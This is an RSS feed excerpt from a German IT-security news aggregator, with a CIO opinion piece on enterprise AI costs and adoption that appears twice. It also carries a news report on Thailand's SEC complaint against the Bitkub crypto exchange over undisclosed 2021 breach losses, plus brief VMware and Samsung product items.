<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=autocad+250month+heres+what%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Thu, 30 Jul 2026 01:21:40 +0200</lastBuildDate>
<pubDate>Thu, 30 Jul 2026 01:21:40 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=autocad+250month+heres+what%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=autocad+250month+heres+what%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Why I changed how I pitch AI: It’s no longer about saving money, but managing tokens and adoption]]></title>
<description><![CDATA[I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.



The initial hype has ...]]></description>
<link>https://tsecurity.de/de/3694390/it-security-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694390/it-security-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.</p>



<p class="wp-block-paragraph">The initial hype has faded, leaving CIOs to drive real enterprise value. Based on my experience implementing Google, OpenAI and Anthropic technologies, here are the fundamental, technology-agnostic lessons every leader must anchor their strategy around.</p>



<h2 class="wp-block-heading"><a></a>AI as a leadership multiplier</h2>



<p class="wp-block-paragraph">The most common tactical error we see is treating AI as an isolated technology project. What I have observed among our customers is that true success does not come from organizations that define a standalone “AI strategy,” but rather from those leaders that integrate AI into their business strategy.</p>



<p class="wp-block-paragraph">When our customers isolate AI and define an AI strategy, it inevitably treats it like a “technological toy” to experiment with. This approach yields fragmented, orphaned initiatives that fail to scale because they are fundamentally disconnected from their core corporate objectives. What I learned is that AI is not the ultimate destination; it is a powerful catalyst. We have replaced “What can AI do for our customers?” with a more strategic question, “How does AI accelerate their existing business goals?”</p>



<p class="wp-block-paragraph">Think of AI like electricity. No modern corporation designs a standalone “electricity strategy.” Instead, all companies route it invisibly across the entire organization to illuminate offices, power production lines and drive communication. AI must be woven into the enterprise fabric in the exact same way, acting as an underlying utility that supercharges your existing operational model.</p>



<p class="wp-block-paragraph">Integrating AI into the broader business strategy also dictates how we measure success. It forces a shift away from short-term tech vanity metrics and anchors the technology into a long-term roadmap.</p>



<p class="wp-block-paragraph">When AI remains trapped within the IT department of our customers, we notice that it is relegated to a mere “software experiment.” To become a true competitive advantage, we observed that AI requires intense cross-functional orchestration. This perspective does not diminish the merit of the technical team; their expertise is fundamental for establishing the architecture, data governance and tools your enterprise requires. However, while IT builds the foundational infrastructure, it lacks the organizational authority to decide what should be built on top of it. Only the CEO or the owner of the company can step in to ensure AI leaves the “toy project” phase and integrates into the DNA of the organization.</p>



<p class="wp-block-paragraph">The requirement for top-down, executive ownership stems from three critical realities observed in the field:</p>



<ul class="wp-block-list">
<li><strong>Silo-smashing and data collaboration:</strong> True enterprise AI is data-hungry and that data lives across disparate business lines, finance, operations, marketing and customer service. Only the CEO possesses the cross-functional authority to demand that data silos be dismantled.</li>



<li><strong>Cultural transformation and fear mitigation:</strong> AI triggers widespread anxiety over job displacement across all industries and hierarchies. When relegated to an “IT project,” resistance spikes as teams view it as a threat to their livelihoods. When I saw the CEO lead this cultural shift directly is when I noticed the best results.</li>



<li><strong>C-Suite education and strategic alignment:</strong> The mandate for AI capability cannot just be delegated downward; the transformation must begin at the very top. I have conducted more than 70 presentations for the Board of Directors and C-Level teams. These people need to be actively educated not on technical code, but on specific business use cases, return on investment (ROI) frameworks and how AI resolves core organizational bottlenecks.</li>
</ul>



<p class="wp-block-paragraph"><a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html">PwC’s data found that only 12% of enterprises have achieved both cost and revenue benefits from AI</a>. Those elite 12% succeeded precisely because their CEOs embedded AI extensively across <em>strategic decision-making and cross-functional workflows</em>. AI is simply too disruptive and too critical to be left exclusively in the hands of technical experts. If AI is not on the CEO’s weekly agenda, it is fundamentally missing from the company’s true strategy.</p>



<h2 class="wp-block-heading"><a></a>AI as a new operational framework</h2>



<p class="wp-block-paragraph">Traditional IT systems have operated on strict algorithmic certainty: if you input a specific set of data, the system executes an immutable line of code and guarantees the same, predictable output every single time.</p>



<p class="wp-block-paragraph">AI completely breaks this paradigm. Because modern AI is built on probabilistic models, it does not execute static formulas; instead, it predicts the most likely correct response based on mathematical probabilities. This means that AI solutions carry an inherent, small percentage of uncertainty and variability. A prompt entered today might yield a slightly different, though contextually valid, output tomorrow.</p>



<p class="wp-block-paragraph">Executive leadership and organizational cultures must be actively educated to accept and navigate this fundamental shift. Traditional quality assurance frameworks for software are designed for a 100% success rate. Applying this rigid standard to AI will paralyze your initiatives, keeping 80% of your projects trapped eternally in the pilot phase. This happened to us in a food and beverage company in Latin America a couple of years ago. After this experience, we started to include conditions in our contracts that tolerate statistical margins of error and still define the project as a success.</p>



<p class="wp-block-paragraph">In terms of cost calculation, we had to teach CIOs and business managers to forget the monthly subscription model for AI and learn to manage the primary unit of exchange in modern AI: the token.</p>



<p class="wp-block-paragraph">To understand AI costs, executives must understand how large language models process data. AI models do not read full words; instead, they break text, images or code down into “pieces” called tokens. As a baseline, every 100 words process as approximately 130 to 140 tokens. Because the major AI providers use the token as their currency, <a href="https://arxiv.org/pdf/2604.22750">your business is billed dynamically based on the exact volume of tokens consumed</a> by every query submitted (input) and every response generated (output).</p>



<p class="wp-block-paragraph">Many leaders believe AI costs are fixed due to flat-rate enterprise tiers ($25–$30/user). This is a temporary illusion. These venture-capital-subsidized rates mask true operational costs and come with dynamic usage limits. Modeling long-term ROI on them guarantees a severe budget shock when true consumption pricing takes over.</p>



<p class="wp-block-paragraph">The solution is not to halt AI adoption; doing so means losing your competitive edge. Instead, the cost per token must cease to be treated as a technical footnote relegated to the IT department. It must be elevated to a core business variable.</p>



<h2 class="wp-block-heading">Risks in the AI adoption model</h2>



<p class="wp-block-paragraph">Since the beginning of the AI boom, I have seen all our customers making a critical tactical error that could cost them heavily in the medium term: they are focusing only on operational efficiency (reducing costs with AI).</p>



<p class="wp-block-paragraph">I have observed that an alarmingly high percentage of companies remain trapped in pilot phases focused exclusively on short-term cost reduction. <a href="https://www.bain.com/insights/your-ai-budget-is-growing-your-returns-arent-heres-why/">Bain &amp; Company’s global Automation and AI Pathfinder Survey </a>found that the largest share of companies measuring their AI initiatives (exactly 40%) realized cost reductions of 10% or less, heavily missing their internal targets. Our customers are putting too many resources and effort into marginal financial gains and in doing so, they are jeopardizing their most valuable assets: service quality, resilience and customer trust.</p>



<p class="wp-block-paragraph">Utilizing AI solely to slash headcount or cut operational corners is a dangerous trap that introduces severe field liabilities. A financial service organization in Latin America announced that they saved $1 million in customer support by replacing humans with AI chatbots. However, the mid-term reality revealed a different story: a damaged brand reputation due to AI errors and an influx of frustrated clients fleeing because the automated system cannot handle special cases.</p>



<p class="wp-block-paragraph">Putting a company on an extreme AI diet might make it look leaner on next quarter’s financial statement, but over-indexing on cost-cutting will ultimately leave the business too weak to compete when market dynamics shift. We are now inviting our customers to change the question from <em>“How much money will AI save us?”</em> to <em>“How will we leverage AI to exponentially increase the long-term value of our enterprise?”</em></p>



<p class="wp-block-paragraph">Deploying enterprise AI is a marathon, not a sprint, and the terrain changes with every mile. The organizations that thrive in this next era will be those that transition from fascination to discipline, treating AI not as a magic bullet for immediate savings, but as a core capability that demands rigorous governance, architectural foresight and cultural maturity. Navigating this shift requires moving past the theoretical hype and anchoring decisions in raw, field-tested reality.</p>



<p class="wp-block-paragraph">As we continue to deploy these technologies across industries, the blueprint for success is being rewritten in real time. Let’s keep this conversation going as we map out the future of business intelligence together.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why I changed how I pitch AI: It’s no longer about saving money, but managing tokens and adoption]]></title>
<description><![CDATA[I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.



The initial hype has ...]]></description>
<link>https://tsecurity.de/de/3691324/it-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691324/it-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</guid>
<pubDate>Fri, 24 Jul 2026 13:04:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.</p>



<p class="wp-block-paragraph">The initial hype has faded, leaving CIOs to drive real enterprise value. Based on my experience implementing Google, OpenAI and Anthropic technologies, here are the fundamental, technology-agnostic lessons every leader must anchor their strategy around.</p>



<h2 class="wp-block-heading"><a></a>AI as a leadership multiplier</h2>



<p class="wp-block-paragraph">The most common tactical error we see is treating AI as an isolated technology project. What I have observed among our customers is that true success does not come from organizations that define a standalone “AI strategy,” but rather from those leaders that integrate AI into their business strategy.</p>



<p class="wp-block-paragraph">When our customers isolate AI and define an AI strategy, it inevitably treats it like a “technological toy” to experiment with. This approach yields fragmented, orphaned initiatives that fail to scale because they are fundamentally disconnected from their core corporate objectives. What I learned is that AI is not the ultimate destination; it is a powerful catalyst. We have replaced “What can AI do for our customers?” with a more strategic question, “How does AI accelerate their existing business goals?”</p>



<p class="wp-block-paragraph">Think of AI like electricity. No modern corporation designs a standalone “electricity strategy.” Instead, all companies route it invisibly across the entire organization to illuminate offices, power production lines and drive communication. AI must be woven into the enterprise fabric in the exact same way, acting as an underlying utility that supercharges your existing operational model.</p>



<p class="wp-block-paragraph">Integrating AI into the broader business strategy also dictates how we measure success. It forces a shift away from short-term tech vanity metrics and anchors the technology into a long-term roadmap.</p>



<p class="wp-block-paragraph">When AI remains trapped within the IT department of our customers, we notice that it is relegated to a mere “software experiment.” To become a true competitive advantage, we observed that AI requires intense cross-functional orchestration. This perspective does not diminish the merit of the technical team; their expertise is fundamental for establishing the architecture, data governance and tools your enterprise requires. However, while IT builds the foundational infrastructure, it lacks the organizational authority to decide what should be built on top of it. Only the CEO or the owner of the company can step in to ensure AI leaves the “toy project” phase and integrates into the DNA of the organization.</p>



<p class="wp-block-paragraph">The requirement for top-down, executive ownership stems from three critical realities observed in the field:</p>



<ul class="wp-block-list">
<li><strong>Silo-smashing and data collaboration:</strong> True enterprise AI is data-hungry and that data lives across disparate business lines, finance, operations, marketing and customer service. Only the CEO possesses the cross-functional authority to demand that data silos be dismantled.</li>



<li><strong>Cultural transformation and fear mitigation:</strong> AI triggers widespread anxiety over job displacement across all industries and hierarchies. When relegated to an “IT project,” resistance spikes as teams view it as a threat to their livelihoods. When I saw the CEO lead this cultural shift directly is when I noticed the best results.</li>



<li><strong>C-Suite education and strategic alignment:</strong> The mandate for AI capability cannot just be delegated downward; the transformation must begin at the very top. I have conducted more than 70 presentations for the Board of Directors and C-Level teams. These people need to be actively educated not on technical code, but on specific business use cases, return on investment (ROI) frameworks and how AI resolves core organizational bottlenecks.</li>
</ul>



<p class="wp-block-paragraph"><a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html">PwC’s data found that only 12% of enterprises have achieved both cost and revenue benefits from AI</a>. Those elite 12% succeeded precisely because their CEOs embedded AI extensively across <em>strategic decision-making and cross-functional workflows</em>. AI is simply too disruptive and too critical to be left exclusively in the hands of technical experts. If AI is not on the CEO’s weekly agenda, it is fundamentally missing from the company’s true strategy.</p>



<h2 class="wp-block-heading"><a></a>AI as a new operational framework</h2>



<p class="wp-block-paragraph">Traditional IT systems have operated on strict algorithmic certainty: if you input a specific set of data, the system executes an immutable line of code and guarantees the same, predictable output every single time.</p>



<p class="wp-block-paragraph">AI completely breaks this paradigm. Because modern AI is built on probabilistic models, it does not execute static formulas; instead, it predicts the most likely correct response based on mathematical probabilities. This means that AI solutions carry an inherent, small percentage of uncertainty and variability. A prompt entered today might yield a slightly different, though contextually valid, output tomorrow.</p>



<p class="wp-block-paragraph">Executive leadership and organizational cultures must be actively educated to accept and navigate this fundamental shift. Traditional quality assurance frameworks for software are designed for a 100% success rate. Applying this rigid standard to AI will paralyze your initiatives, keeping 80% of your projects trapped eternally in the pilot phase. This happened to us in a food and beverage company in Latin America a couple of years ago. After this experience, we started to include conditions in our contracts that tolerate statistical margins of error and still define the project as a success.</p>



<p class="wp-block-paragraph">In terms of cost calculation, we had to teach CIOs and business managers to forget the monthly subscription model for AI and learn to manage the primary unit of exchange in modern AI: the token.</p>



<p class="wp-block-paragraph">To understand AI costs, executives must understand how large language models process data. AI models do not read full words; instead, they break text, images or code down into “pieces” called tokens. As a baseline, every 100 words process as approximately 130 to 140 tokens. Because the major AI providers use the token as their currency, <a href="https://arxiv.org/pdf/2604.22750">your business is billed dynamically based on the exact volume of tokens consumed</a> by every query submitted (input) and every response generated (output).</p>



<p class="wp-block-paragraph">Many leaders believe AI costs are fixed due to flat-rate enterprise tiers ($25–$30/user). This is a temporary illusion. These venture-capital-subsidized rates mask true operational costs and come with dynamic usage limits. Modeling long-term ROI on them guarantees a severe budget shock when true consumption pricing takes over.</p>



<p class="wp-block-paragraph">The solution is not to halt AI adoption; doing so means losing your competitive edge. Instead, the cost per token must cease to be treated as a technical footnote relegated to the IT department. It must be elevated to a core business variable.</p>



<h2 class="wp-block-heading">Risks in the AI adoption model</h2>



<p class="wp-block-paragraph">Since the beginning of the AI boom, I have seen all our customers making a critical tactical error that could cost them heavily in the medium term: they are focusing only on operational efficiency (reducing costs with AI).</p>



<p class="wp-block-paragraph">I have observed that an alarmingly high percentage of companies remain trapped in pilot phases focused exclusively on short-term cost reduction. <a href="https://www.bain.com/insights/your-ai-budget-is-growing-your-returns-arent-heres-why/">Bain &amp; Company’s global Automation and AI Pathfinder Survey </a>found that the largest share of companies measuring their AI initiatives (exactly 40%) realized cost reductions of 10% or less, heavily missing their internal targets. Our customers are putting too many resources and effort into marginal financial gains and in doing so, they are jeopardizing their most valuable assets: service quality, resilience and customer trust.</p>



<p class="wp-block-paragraph">Utilizing AI solely to slash headcount or cut operational corners is a dangerous trap that introduces severe field liabilities. A financial service organization in Latin America announced that they saved $1 million in customer support by replacing humans with AI chatbots. However, the mid-term reality revealed a different story: a damaged brand reputation due to AI errors and an influx of frustrated clients fleeing because the automated system cannot handle special cases.</p>



<p class="wp-block-paragraph">Putting a company on an extreme AI diet might make it look leaner on next quarter’s financial statement, but over-indexing on cost-cutting will ultimately leave the business too weak to compete when market dynamics shift. We are now inviting our customers to change the question from <em>“How much money will AI save us?”</em> to <em>“How will we leverage AI to exponentially increase the long-term value of our enterprise?”</em></p>



<p class="wp-block-paragraph">Deploying enterprise AI is a marathon, not a sprint, and the terrain changes with every mile. The organizations that thrive in this next era will be those that transition from fascination to discipline, treating AI not as a magic bullet for immediate savings, but as a core capability that demands rigorous governance, architectural foresight and cultural maturity. Navigating this shift requires moving past the theoretical hype and anchoring decisions in raw, field-tested reality.</p>



<p class="wp-block-paragraph">As we continue to deploy these technologies across industries, the blueprint for success is being rewritten in real time. Let’s keep this conversation going as we map out the future of business intelligence together.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thailand SEC Files Criminal Complaint Against Bitkub Over 2021 Cyberattack]]></title>
<description><![CDATA[Thailand's cryptocurrency exchange Bitkub has rejected allegations of fraud after the Thailand SEC filed a criminal complaint related to the company's disclosures following the Bitkub cyberattack in 2021. The case focuses on how the exchange reported the impact of the cyberattack on Bitkub to reg...]]></description>
<link>https://tsecurity.de/de/3690896/it-security-nachrichten/thailand-sec-files-criminal-complaint-against-bitkub-over-2021-cyberattack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690896/it-security-nachrichten/thailand-sec-files-criminal-complaint-against-bitkub-over-2021-cyberattack/</guid>
<pubDate>Fri, 24 Jul 2026 09:10:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="832" height="515" src="https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Bitkub cyberattack" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack.webp 832w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-300x186.webp 300w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-768x475.webp 768w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-600x371.webp 600w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-150x93.webp 150w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-750x464.webp 750w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack.webp 832w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-300x186.webp 300w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-768x475.webp 768w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-600x371.webp 600w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-150x93.webp 150w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-750x464.webp 750w" sizes="(max-width: 832px) 100vw, 832px" title="Thailand SEC Files Criminal Complaint Against Bitkub Over 2021 Cyberattack 1"></p><span data-contrast="auto">Thailand's cryptocurrency exchange Bitkub has rejected allegations of fraud after the Thailand SEC filed a criminal complaint related to the company's disclosures following the Bitkub cyberattack in 2021. The case focuses on how the exchange reported the impact of the cyberattack on Bitkub to regulators, rather than on the safety of customer funds.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">In response to the complaint, Bitkub stated that all customer assets currently held on its platform remain safe, fully accounted for, and protected in accordance with applicable regulations. The company argued that the allegations stem from decisions made during the aftermath of the 2021 <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="29116">security</a> breach and do not reflect fraudulent conduct.</span><span data-ccp-props="{}"> </span>
<h3><strong>Thailand SEC Files Complaint Over the 2021 Bitkub Cyberattack </strong></h3>
<span data-contrast="auto">On 23 July 2026, the<a href="https://www.sec.or.th/EN/Pages/News_Detail.aspx?SECID=13139" target="_blank" rel="nofollow noopener"> Thailand SEC filed a criminal complaint</a> against Bitkub Online Co., Ltd. and its former directors, Sakolkorn Sakavee and Thaweesap Rawan. The regulator alleged that the company's daily net capital reports submitted between 10 May and 30 October 2021 failed to accurately reflect the material reduction in its digital asset holdings caused by the Bitkub <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="29115">cyberattack</a>.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">According to the regulator, the reports did not disclose the impact of the theft on the company's asset balance. The Thailand SEC also accused the two former directors of making false entries in company documents that gave the impression that customer assets were still being held normally and that the company had not suffered any damage.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The complaint has been referred to Thailand's Economic Crime Suppression Division for further investigation. Following that process, the matter may be forwarded to prosecutors and the courts. The Thailand SEC noted that filing a <a href="https://thecyberexpress.com/fake-emails-scam-indians-heres-what-to-know/" target="_blank" rel="noopener">criminal complaint</a> does not represent a final determination of guilt.</span><span data-ccp-props="{}"> </span>
<h3><strong>Bitkub Says Disclosure Decision was Intended to Prevent Customer Losses</strong></h3>
<span data-contrast="auto">Following media reports about the complaint, <a href="https://www.linkedin.com/posts/on-23-july-2026-news-reports-emerged-regarding-share-7486045546315694081-abKc/?utm_source=share&amp;utm_medium=member_android&amp;rcm=ACoAAAfAnJwBMfzai0rLzfzxnZE_NCnVt2ZLE_o" target="_blank" rel="nofollow noopener">Bitkub published a statement on LinkedIn</a> explaining its position on the cyberattack and the subsequent reporting decisions.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The company said the allegations relate to an incident in early May 2021, when one of its digital asset wallets was compromised by cybercriminals. Bitkub acknowledged that the breach was not disclosed at the time.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">According to the company, the individual responsible for disclosure obligations deliberately withheld information about the wallet compromise. Bitkub said the decision was made to avoid triggering a "bank run," or mass withdrawals of digital assets by customers, while the company worked to replace the stolen assets.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The exchange stated:</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">"The decision of such individual not to disclose the incident was made with the intention to prevent a bank run—that is, a mass withdrawal of digital assets by customers upon learning of the theft—which could have rendered the Company unable to procure sufficient replacement digital assets for the customers while the recovery process was still ongoing."</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Bitkub added that such a scenario could have resulted in significant customer losses and broader damage to Thailand's digital asset industry.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The company also stressed that, at the time of the Bitkub <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-a-cyber-attack/" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="29117">cyberattack</a>, all of its digital asset wallet security systems complied with standards prescribed by the relevant authorities and had been audited.</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">Co-founders Replaced Stolen Assets After Cyberattack on Bitkub</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Although the digital assets stolen during the cyberattack on Bitkub were never recovered, the company said its co-founders voluntarily absorbed the <a href="https://thecyberexpress.com/keytronic-reveals-million-loss-cyberattack/" target="_blank" rel="noopener">financial loss</a>.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">According to Bitkub, the co-founders purchased digital assets matching the same types and quantities as those stolen and transferred them to the company. As a result, the exchange said neither its customers nor the business ultimately suffered any financial loss from the incident.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">In its statement, Bitkub said:</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">"As no bank run occurred, even though the stolen digital assets could not be recovered, the Co-Founders of the Bitkub Group voluntarily absorbed the loss by purchasing equivalent digital assets (in the same type and quantity as those stolen) and providing them to the Company. Consequently, neither the Company nor its customers suffered any financial loss from the theft."</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">Thailand SEC Previously Confirmed Customer Assets Were Intact</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Bitkub also pointed to the findings of an earlier inspection conducted by the Thailand SEC after reports of the Bitkub cyberattack surfaced online.</span><span data-ccp-props="{}"> </span><span data-contrast="auto">According to the company, the regulator verified that, as of 8 September 2025, all customer assets held by the exchange were safe and fully accounted for.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The company reiterated this point in its latest statement, saying:</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">"At the outset, for the sake of clarity and mutual understanding, the Company wishes to affirm that all customers' assets currently held by the Company are safe and fully accounted for. The Company reiterates its strict compliance with all applicable laws and regulations in safeguarding and maintaining customer assets."</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Bitkub maintained that the criminal complaint relates to historical reporting practices between May and October 2021, more than five years ago, rather than to the current condition of customer assets or any ongoing security concerns.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">As the investigation proceeds, the case will determine whether the company's reporting following the Bitkub cyberattack complied with regulatory requirements. For now, the complaint remains an allegation, and the legal process involving the Thailand SEC, investigators, prosecutors, and the courts has yet to reach a final conclusion.</span><span data-ccp-props="{}"> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[We Asked an Independent Lab to Time Us. Here’s What They Found.]]></title>
<description><![CDATA[A new Principled Technologies benchmark tested VMware Data Services Manager 9.1 against manual PostgreSQL operations across five real world scenarios. It’s Tuesday afternoon. A developer submits a ticket requesting a new PostgreSQL HA cluster for a pre-production environment. Your DBA opens vCent...]]></description>
<link>https://tsecurity.de/de/3689034/downloads/we-asked-an-independent-lab-to-time-us-heres-what-they-found/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689034/downloads/we-asked-an-independent-lab-to-time-us-heres-what-they-found/</guid>
<pubDate>Thu, 23 Jul 2026 14:32:09 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img width="300" height="167" src="https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/07/PT-DSM-White-Paper-Announcement.jpg?w=300" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/07/PT-DSM-White-Paper-Announcement.jpg 1376w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/07/PT-DSM-White-Paper-Announcement.jpg?resize=300,167 300w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/07/PT-DSM-White-Paper-Announcement.jpg?resize=768,429 768w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/07/PT-DSM-White-Paper-Announcement.jpg?resize=1024,572 1024w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/07/PT-DSM-White-Paper-Announcement.jpg?resize=600,335 600w" sizes="(max-width: 300px) 100vw, 300px"></div>
<p>A new Principled Technologies benchmark tested VMware Data Services Manager 9.1 against manual PostgreSQL operations across five real world scenarios. It’s Tuesday afternoon. A developer submits a ticket requesting a new PostgreSQL HA cluster for a pre-production environment. Your DBA opens vCenter, deploys three VMs from the gold template, SSHs into each node, regenerates machine … <a href="https://blogs.vmware.com/cloud-foundation/2026/07/23/we-asked-an-independent-lab-to-time-us-heres-what-they-found/">Continued</a></p>
<p>The post <a href="https://blogs.vmware.com/cloud-foundation/2026/07/23/we-asked-an-independent-lab-to-time-us-heres-what-they-found/">We Asked an Independent Lab to Time Us. Here’s What They Found.</a> appeared first on <a href="https://blogs.vmware.com/cloud-foundation">VMware Cloud Foundation (VCF) Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s $250 Off the New Galaxy Watch Ultra 2]]></title>
<description><![CDATA[The Galaxy Watch Ultra 2 has launched and Samsung raised the price on it to $699.99. That’s a $50 price increase over the original, which tracks since everything in our lives gets more expensive by the day. Want to save $250 off this new Samsung watch? You can. Here’s the best Galaxy Watch Ultra ...]]></description>
<link>https://tsecurity.de/de/3687382/it-nachrichten/heres-250-off-the-new-galaxy-watch-ultra-2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687382/it-nachrichten/heres-250-off-the-new-galaxy-watch-ultra-2/</guid>
<pubDate>Wed, 22 Jul 2026 21:02:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Galaxy Watch Ultra 2 has launched and Samsung raised the price on it to $699.99. That’s a $50 price increase over the original, which tracks since everything in our lives gets more expensive by the day. Want to save $250 off this new Samsung watch? You can. Here’s the best Galaxy Watch Ultra 2...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/07/22/heres-250-off-the-new-galaxy-watch-ultra-2/">Here’s $250 Off the New Galaxy Watch Ultra 2</a></p>]]></content:encoded>
</item>
<item>
